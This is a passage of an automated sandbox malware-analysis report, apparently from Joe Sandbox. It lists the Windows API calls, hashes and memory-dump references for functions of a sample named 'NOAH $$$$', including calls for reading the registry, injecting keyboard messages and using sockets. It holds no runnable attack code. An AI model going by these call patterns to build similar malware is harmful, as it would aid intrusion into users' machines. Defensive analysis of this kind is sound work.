                                                                                                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                        • API String ID: 3207048006-625585964
                                                                                                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                        • _memmove.LIBCMT ref: 004656CA
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2945290962-0
                                                                                                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1457242333-0
                                                                                                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 15295421-0
                                                                                                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                        • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                        • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                        • _wcslen.LIBCMT ref: 00467793
                                                                                                                                        • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 780548581-3081909835
                                                                                                                                        • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                        • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                                                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4082120231-0
                                                                                                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2027346449-0
                                                                                                                                        • Opcode ID: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                        • Opcode Fuzzy Hash: f0ceecdc90b01f2c9ddf0369269a16fa16a69f0e3d9f986347dd5438d1ccccc0
                                                                                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                        • GetMenu.USER32 ref: 0047A703
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3257027151-0
                                                                                                                                        • Opcode ID: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                        • Opcode Fuzzy Hash: 80d25b5d47cdb8856cfd5c6f23c0a19e515c97fff049208cbae9d6eea43d64d6
                                                                                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                        APIs
                                                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastselect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 215497628-0
                                                                                                                                        • Opcode ID: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                        • Opcode Fuzzy Hash: 7869ea255bd8c826c1db511583610b45135028457a69a3d51942e2ff55a69274
                                                                                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 00444633
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2354583917-0
